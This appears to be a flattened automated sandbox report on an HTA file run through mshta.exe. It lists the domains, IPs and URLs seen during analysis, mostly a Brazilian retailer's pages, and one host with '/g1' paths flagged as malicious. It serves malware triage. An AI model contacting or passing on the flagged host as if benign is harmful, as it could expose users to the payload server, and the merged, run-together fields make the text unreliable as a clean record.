No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
securepubads.g.doubleclick.net
142.250.181.130
truefalse
    high
    102.57.205.92.host.secureserver.net
    92.205.57.102
    truetrue
      unknown
      static.nl3.vip.prod.criteo.net
      178.250.1.3
      truefalse
        high
        s3-sa-east-1.amazonaws.com
        16.12.2.60
        truefalse
          high
          s3-r-w.sa-east-1.amazonaws.com
          3.5.234.55
          truefalse
            high
            www.americanas.com.br
            unknown
            unknownfalse
              high
              statics-americanas.b2w.io
              unknown
              unknownfalse
                unknown
                logs-referer.s3-sa-east-1.amazonaws.com
                unknown
                unknownfalse
                  unknown
                  static.criteo.net
                  unknown
                  unknownfalse
                    high
                    images-americanas.b2w.io
                    unknown
                    unknownfalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      https://102.57.205.92.host.secureserver.net//g1true
                        unknown
                        https://102.57.205.92.host.secureserver.net/g1/true
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          https://www.americanas.com.br/hotsite/termos-e-condicoes?chave=dk_hm_ft_00_06_termosamshta.exe, 00000000.00000003.540438972.0000000007AD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537867574.0000000007AAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540834795.0000000007AD1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007A50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538411913.0000000007AB7000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://www.americanas.com.br/categoria/eletrodomesticos?chave=pfm_hm_tt_1_0_eletrodommshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540213633.0000000005164000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538862819.000000000515E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.000000000515F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007B47000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                              high
                              https://www.americanas.com.br/categoria/utilidadesE)mshta.exe, 00000000.00000003.540298823.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.542885580.0000000005279000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548594202.000000000527B000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://www.americanas.com.br/hotsite/banner-pcs?chave=dk_hm_bn_5_2_pcsmeta.largemeta.large.heightmemshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://www.americanas.com.br/lojas-proximas?delivery=pick-up-store&chave=dk_hm_ats_2_2_entregamshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                    high
                                    https://www.americanas.com.br/especial/oferta-do-dia?chave=prf_hm_0_tt_7_mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539149198.000000000514B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539161574.0000000005152000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                      high
                                      https://images-americanas.b2w.io/spacey/acom/2022/07/15/_informatica-a6061b57bcbc.pngmshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538850057.0000000005165000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.0000000005166000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                        high
                                        https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_MOVEIS-8a19bbc2275c.pngispmshta.exe, 00000000.00000003.537786668.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539662366.0000000004494000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://www.americanas.com.br/categoria/suplementosVmshta.exe, 00000000.00000003.540298823.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.542885580.0000000005279000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548594202.000000000527B000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://www.americanas.com.br/busca/ar-condicionado-portatilmshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.536542022.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.524234567.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484331936.0000000005367000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                              high
                                              https://www.americanas.com.br/hotsite/duvidasdiv770mshta.exe, 00000000.00000003.540298823.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.542885580.0000000005279000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548706573.0000000005281000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548594202.000000000527B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://images-americanas.b2w.io/spacey/acom/2023/11/09/lojas_oficiais-432x540px-13e329cb6b3b.pngmshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540237396.0000000000759000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005E24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484331936.0000000005367000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                  high
                                                  https://www.americanas.com.br/categoria/papelaria?chave=dk_hm_at_papelariamshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540463831.0000000007969000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                    high
                                                    https://www.americanas.com.br/hotsite/termos-e-condicoes?chave=dk_hm_ft_00_06_termossmshta.exe, 00000000.00000003.540438972.0000000007AD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537867574.0000000007AAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540834795.0000000007AD1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007A50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538411913.0000000007AB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://www.americanas.com.br/produto/7503637854?chave=dk_hm_bn_4_8_oferta-o2omshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                        high
                                                        https://www.americanas.com.br/categoria/eletrodomesticos/forno-de-embutir?chave=pfm_hm_tt_1_0_forno-mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538850057.0000000005165000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                          high
                                                          https://ri.americanas.com/governanca-corporativa/estatuto-codigos-e-politicasmshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539645441.0000000007984000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.542912735.00000000079D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538072268.0000000007982000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548679681.0000000005D1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540114671.00000000079CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539776600.00000000079B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.541042280.0000000005D1D000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                            unknown
                                                            https://www.americanas.com.br/categoria/moveis/cama?chave=pfm_hm_tt_1_0_camamshta.exe, 00000000.00000003.538977020.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538952952.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                              high
                                                              https://canaldedenuncias.com.br/universoamericanas/mshta.exe, 00000000.00000003.538977020.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535526908.0000000005340000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538952952.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005DCD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535351898.0000000005337000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535471671.000000000533C000.00000004.00000800.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                unknown
                                                                https://www.americanas.com.br/busca/xbox-series-smshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.536542022.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.524234567.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484331936.0000000005367000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                  high
                                                                  https://www.americanas.com.br/hotsite/servicos/home?chave=dk_hm_branding_servicosmshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005E24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539906624.0000000005140000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                    high
                                                                    https://empresas.americanas.com.br/?chave=brd_hm_mn_0_bottom_bndesmshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540262182.000000000444A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                      unknown
                                                                      https://cliente.americanas.com.br/minha-contamshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537933006.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C82000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.542489956.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                        unknown
                                                                        https://www.americanas.com.br/categoria/moveis?chave=dk_hm_at_moveismshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540586764.0000000007943000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548308733.0000000007943000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                          high
                                                                          https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-cama-mesa-banho-b9a0799a7519.pngay:-mshta.exe, 00000000.00000003.537786668.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548436103.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540937966.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539662366.0000000004494000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://images-americanas.b2w.io/spacey/acom/2024/12/09/sec-brinquedos_esporte-e-lazer-destaque-mob-mshta.exe, 00000000.00000003.538629144.000000000070C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535449726.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538952952.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535589591.0000000005309000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535199624.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535775149.000000000530C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                              high
